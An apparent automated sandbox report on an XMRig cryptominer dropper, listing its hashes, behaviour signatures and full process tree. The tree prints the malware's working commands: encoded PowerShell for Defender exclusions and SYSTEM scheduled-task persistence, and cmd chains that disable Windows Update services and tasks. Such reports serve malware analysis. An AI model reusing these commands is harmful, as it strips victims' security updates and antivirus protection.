Analysis

  • max time kernel
    152s
  • max time network
    127s
  • platform
    windows10-1703_x64
  • resource
    win10-20220722-en
  • resource tags

    arch:x64arch:x86image:win10-20220722-enlocale:en-usos:windows10-1703-x64system
  • submitted
    11-08-2022 22:16

General

  • Target

    1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe

  • Size

    5.0MB

  • MD5

    c7ad8aff4b9bcaaf8362bc46dbb335bd

  • SHA1

    6da9bd46beba784cde7bce3d73963567c9efb9b0

  • SHA256

    1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84

  • SHA512

    e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe
    "C:\Users\Admin\AppData\Local\Temp\1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4052
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1940
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:3032
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:3688
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:3608
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:4880
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:5032
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:4216
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:732
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:2904
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:3108
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4892
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3140
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:4720
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1316
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1552
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1296
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1484
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:2516
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:3704
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:2356
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:4308
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:1832
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:4304
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3468
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3596
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1948
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1952
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3612
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZAB4AHAAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAWgBBAEIANgBBAEcATQBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAE4AQQBBAHkAQQBEAE0AQQBOAFEAQQAxAEEARABNAEEATQBnAEEAMgBBAEQARQBBAEwAUQBCAE8AQQBEAFUAQQBNAGcAQQAxAEEARABRAEEATQBnAEEAdABBAEQAVQBBAE4AZwBCAEcAQQBFAGMAQQBVAHcAQgBJAEEARgB3AEEAWgB3AEIAegBBAEcAUQBBAE4AUQBBADAAQQBEAE0AQQBNAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAYQBRAEIAMQBBAEgAawBBAFoAZwBBAGoAQQBEADQAQQAiACcAKQAgADwAIwBqAHUAdQBlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAeQBtACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAegB4AHoAeAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAZwBzAGQANQA0ADMAMgAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAaQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAYwAxADMANQBiADcAMgBmAGUAOQA5ADUAYwBiADcAYgBlAGEAMAAwAGEAOQBkADcAYwA3ADgAZQA4ADgAYgBlADMAOQA0ADgAMwA0AGUAMgBmADgAMwAxADcAMAAzAGMANgAxADcAMABlADcAYgAzAGQANAAzADAAZAA4ADQALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXAA0ADIAMwA1ADUAMwAyADYAMQAtAE4ANQAyADUANAAyAC0ANQA2AEYARwBTAEgAXABnAHMAZAA1ADQAMwAyAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBqAGsAbQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAZwBzAGQANQA0ADMAMgAnADsA"
                    2⤵
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1916
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4548
                    • C:\Windows\system32\choice.exe
                      choice /C Y /N /D Y /T 3
                      3⤵
                        PID:4512
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAZAB6AGMAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwANAAyADMANQA1ADMAMgA2ADEALQBOADUAMgA1ADQAMgAtADUANgBGAEcAUwBIAFwAZwBzAGQANQA0ADMAMgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB1AHkAZgAjAD4A"
                    1⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:404
                    • C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe
                      "C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2680
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"
                        3⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4632
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        3⤵
                          PID:3244
                          • C:\Windows\system32\sc.exe
                            sc stop UsoSvc
                            4⤵
                            • Launches sc.exe
                            PID:3472
                          • C:\Windows\system32\sc.exe
                            sc stop WaaSMedicSvc
                            4⤵
                            • Launches sc.exe
                            PID:4248
                          • C:\Windows\system32\sc.exe
                            sc stop wuauserv
                            4⤵
                            • Launches sc.exe
                            PID:4060
                          • C:\Windows\system32\sc.exe
                            sc stop bits
                            4⤵
                            • Launches sc.exe
                            PID:760
                          • C:\Windows\system32\sc.exe
                            sc stop dosvc
                            4⤵
                            • Launches sc.exe
                            PID:3128
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                            4⤵
                            • Modifies registry key
                            PID:3188
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                            4⤵
                            • Modifies registry key
                            PID:428
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                            4⤵
                            • Modifies registry key
                            PID:5080
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                            4⤵
                            • Modifies registry key
                            PID:5108
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                            4⤵
                            • Modifies registry key
                            PID:644
                          • C:\Windows\system32\takeown.exe
                            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                            4⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:868
                          • C:\Windows\system32\icacls.exe
                            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                            4⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:68
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:3340
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:2344
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:568
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                            4⤵
                              PID:1212
                            • C:\Windows\system32\reg.exe
                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                              4⤵
                              • Modifies registry key
                              PID:2248
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                              4⤵
                                PID:4804
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                4⤵
                                  PID:2100
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                  4⤵
                                    PID:4520
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                    4⤵
                                      PID:1192
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                      4⤵
                                        PID:4648
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                        4⤵
                                          PID:4696
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        3⤵
                                          PID:2108
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-ac 0
                                            4⤵
                                              PID:4436
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -hibernate-timeout-dc 0
                                              4⤵
                                                PID:4872
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                4⤵
                                                  PID:4508
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                    PID:5084
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe "afakligmufddfq"
                                                  3⤵
                                                    PID:4544
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe yyyqnbmbehbu1 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeMCVFcHvQGvpqy6HCTa4nxzMH7IjZVGtN6ljeCyIgLgbWX0bb/SUlPDjI++OUHr3BKZhWv4AcV/jC84JCaiKu9vF3e8gU2BWEW4we5TvIfhSL/g8FQ17/5MiRlDZpe4egV0h22G6H94GbqNZSuvwTZUlPT7tTTr3NTvnmCkWRBSLKw51gievUjy9hehwxGTB7uL1IlIlYX8WuvVbjTf5em+1Rj2EAlSo3iJO7KaE8E1hC/e1CfGjjnfP46iEiV4/kQOFRXPqVj72rnK2nK6u0K6nbrP578kb0DNQyiRRar3zVRISDZtQkRo6WrfsdZpIeyGwlTINQbOHKa8JGrKq8F2X7MGgcVEgqH9YLgycmv4FtVUk4+fc/zS205jDH6AGw2wpppmxxseQkZe6r+NeYBb2M0ts47rEbtofp+yOfkQLTyqX3iVaTckKB2y84Dx+FSQfebszyXRR/txGxfkBn7MghtS9PM1jC4Hj6IlffMUmwNIiWQ0sMvh2jLQ/F2tvsQ4uywk53rSx7hKxQVhPBzBPvJr+FnOGy6Bd7IzVGFd9M3J7XY49nrDrhlgq0chJeiItenegQe9Mm2AdbXh9kgK6C2K0tQXKIYm4g4p/pMMmAMkjnh4HGPImU8Z/b3GTXAsjhgBl4+MQecdSIiEaDY4EjU+zPEd029dtjAdd4RLP0ydotAEihWTxYtEUfygalAFfMIUpPd2j+199L/lnyFQRjIgqibazW40w3aY/Ck4lN92f3bI95I4hpBCgZiJTeUkjCNWwLGYU31kGGo4eNQPWzsWGnxQIXOmroLqV7rwd9pQmyJDKoL/dIeHV1aONRS9s7kibM3FsRaWBsXMjVSd8kF8MkUQISenHj3q4nCu8dGIrGOg3ORsipXrrJvvEyhXwzgucu8PZlHNNsaViZxlOfx64CYBbJ8C2I26Z4GWQ0sgU5cw18Cq7p22UET+sO1rTR8ka9N8S6IR7ZS5ZSqt75b83NWL3DM8Du+vGeNTLh2YiD4JQjkW05xwcaXZSSyTxJm0N7jnYX+aivkYxNw05JjlVDhJ6PBfp3ia+sk9j2rQhyE3OwCJMYur3W1EBqbdsszL14WSUhMSiOVWh/BVvydYF2eXdcL3TakudqvwIu1LzI4IRqZBzL1FNQngb41y2q6bDtYVR4Fd1OE7ZodT0vEHn/rflYo1RoH3vRidKNfc6difqlgbgh5LLto6T1Z8JZycbgVCPzU7SUMuiB6xqdz1lvuOt/JYcqYgVyJjQA6/2C08DtowfQEm+VPJMqPt83zbgVM+rrX+6zguN4sBfloIuuyk/5P/YiqY4/Zvq/wIlMb5rPmF5Y7umx6ZsmxDjohaKy+oBHEVCUjI5p5xzdFur56oHaYpyS9jNJqk+L1Ekod9ia+wuPlyJE7OqG01zM8epP/cbZNVbXPwEPcYBCUeZVk70kZlN9oXI1oYWRa0PGiS0CGtBRoC5+7Lgs4Q/Wuh4DleAbZlbMaK161ZXCBTll5fMgGsFwSKtQcXEv6PYPviZps3g0FKxiBzTgICRzONbzMgtd8I4oT0QAbuXiaEiH7ZDhMIH6sQiL8xbX0osanYxGZAnDbP0RzBxiNKca18RgKghcy7fFmkjbzVFfoYOFYO01QNOKurQAE3kkCOcwZ8DPey/evm7Y5c5hBqQPnoVKbLNEl5bU+ALncLei8B7IRDy+jYXmKB5u4g2DXtRByJCRhti4SHx7zW9sBUoTqjCbXR0akEJp3f1irXDJU3ORkcXCREBgi4jvWSjlZWAX/Ohvi5aFLp1GiIPN+PA3rnLIyWLZLOh1pidQlOGQItzPUdbHqSQUPgDY3JOhasLohtjxul6PLSFoISCDHQIt5J0rB/TBKVkSQbxVMlmJCI7swuGh0IufmUS4BS1CAPp5JKDgtwgY0/RRwwLL8vDmdacDXVq2H3OORcS4PhBadefdHb4qDTSNis+ctZgirsGYP5F1NgvwnWntI7siztzgvA6k7SqyWNTaLq2DRmyyH+MkrlBtszCr71LXxlyJxfKb6iVCqyFaW8FrRBG6rCkqvO4wybmO1x4o2gAou2gYr6j2OI0fDDWWB05sIQW55iVqROWbD8w7KgtuJRqwD3AGNa3idSdNFCILzmoiQTkmaBFK40EvkLE559rfji5OH2zmQMhaMmvxcuCjubblzlOzZdvjjdYZBw/wHG9VvJGiVQsceu3UHODKSzGUffgdQ9XlNyNpa8FJbWhuy9tzOgNDQ0Tt/Gsn/oXktLhEXYPQiqHJqMtlkcy9Mftsqo4fyjXDG85WFzvMCM1Bq2LCSzJ/un+8MBQQEQ03tLB4D9GRBfCiwdUBuMqWHMRwtFF6m4/TA6Xww6NjHbn7YbouA25QOxrOQdk7CzHh0BLHEfhoTKyPhq+7eKIzg4CnNsef8GZN2xAHdCjl71CkqVjPdp/N0hMHIcKNyPcCWSrw/DdJLS00gKXy7mH7vo3oJtHrh/M5m62rTXukcpVR7T/Rn2QOhTmyCnahsjSCn7+bug==
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4540

                                              Network

